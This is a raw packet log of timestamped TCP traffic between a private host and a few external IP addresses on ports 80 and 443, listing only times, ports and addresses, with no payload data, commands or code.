Nov 26, 2024 00:25:43.188427925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.189312935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.189419031 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.189459085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.189542055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.190591097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.190663099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.190699100 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.190746069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.191704035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.191762924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.191823006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.191905975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.192892075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.192954063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.193025112 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.193089008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.194169998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.194228888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.194431067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.194488049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.195363045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.195420980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.195617914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.195753098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.196577072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.196588993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.196652889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.197730064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.197798967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.197911024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.198501110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.199039936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.199052095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.199129105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.199997902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.200068951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.200213909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.200310946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.201212883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.201245070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.201302052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.202409983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.202469110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.202483892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.202673912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.203577995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.203630924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.203661919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.203711033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.204487085 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204511881 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204524994 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204550028 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204567909 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204579115 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204586029 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.204606056 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.204617977 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.204634905 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.204653978 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.204756975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.204811096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.204852104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.204912901 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.205939054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.209572077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.295419931 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.296014071 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.296039104 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.296499014 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.296511889 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.352893114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.352960110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.352988958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.353018999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.353037119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.353071928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.353072882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.353072882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.359533072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359616995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359648943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359678984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.359682083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359724045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.359745026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.359841108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359853983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359901905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359905005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.359914064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.359961033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.360025883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.360037088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.360085964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.360102892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.360105991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.360157013 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.360157013 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.361860037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.361872911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.361922026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.361982107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.361994982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.362049103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.364029884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.364088058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.364219904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.364270926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.364353895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.364470959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.364523888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.365832090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.365844965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.365897894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.368314981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.368325949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.368369102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.368396044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.368453026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.368489027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.368534088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.369118929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.369168043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.369198084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.369229078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.370305061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.370316982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.370364904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.371505022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.371515989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.371570110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.372662067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.372721910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.372792006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.372848034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.373881102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.373933077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.373936892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.373994112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.375068903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.375149012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.375154972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.375197887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.376220942 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.376274109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.376293898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.376346111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.377408028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.377495050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.377592087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.377650023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.378593922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.378662109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.378698111 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.378757954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.379894972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.379908085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.379962921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.381127119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.381191015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.381413937 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.381467104 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.382209063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.382230997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.382266998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.382318974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.383316040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.383369923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.383404016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.383485079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.384571075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.384627104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.384634018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.384669065 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.385659933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.385766983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.385778904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.385812998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.386374950 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.386408091 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.386442900 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.386471987 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.386488914 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.386512995 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.386926889 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.386941910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.386981010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.387013912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.388098955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.388154984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.388211012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.388372898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.401906967 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.402565002 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.402622938 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.403404951 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.403419018 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.432091951 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.432120085 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.432149887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.432192087 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.432229042 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.432241917 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.432431936 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.552159071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.552263021 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.552290916 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.552340984 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.552366018 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.552378893 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.552469015 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.592673063 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.592694998 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.592749119 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.592772007 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.592798948 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.592818975 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.623097897 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.623152018 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.623193979 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.623219013 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.623234034 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.623286963 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.685765028 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.686053991 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.686080933 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.687102079 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.687160969 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.688409090 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.688478947 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.732191086 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.732486010 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.732516050 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.732848883 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.733227015 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.733299971 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.742640972 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.742664099 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:43.752466917 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.752496004 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.752537966 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.752559900 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.752573967 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.752607107 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.772059917 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.772089005 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.772161961 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.772183895 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.772257090 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.785583973 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.785665989 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.785909891 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.785942078 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.785953999 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.785964012 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.785969973 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.789057016 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.789093018 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.789305925 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.789469004 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.789484978 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.794694901 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.794728041 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.794779062 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.794789076 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.794820070 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.794838905 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.796740055 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.815960884 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.815994024 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.816039085 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.816067934 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.816082954 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.816123962 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.838563919 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.838597059 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.838643074 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.838653088 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.838689089 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.838706017 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.843040943 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:43.861330032 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.861366987 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.861416101 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.861437082 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.861449957 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.861495018 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.861715078 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.861973047 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.862149000 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.862938881 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.862956047 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.862991095 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.862996101 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.867042065 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.867094994 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.867177963 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.871937990 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:43.871964931 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:43.878880024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.878892899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.878951073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.878978968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.879148006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.879192114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.879215956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.879252911 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.880337000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.880399942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.880434990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.880471945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.881340027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.881351948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.881392002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.881413937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.882541895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.882550001 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.882611990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.883595943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.883651972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.883677959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.883730888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.884803057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.884886980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.884892941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.885519981 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.885991096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.886046886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.886085987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.887360096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.887371063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.887418985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.888412952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.888478041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.888526917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.889571905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:43.889611959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:43.889643908 CET	80	49795	185.215.113.206	192.168.2.6
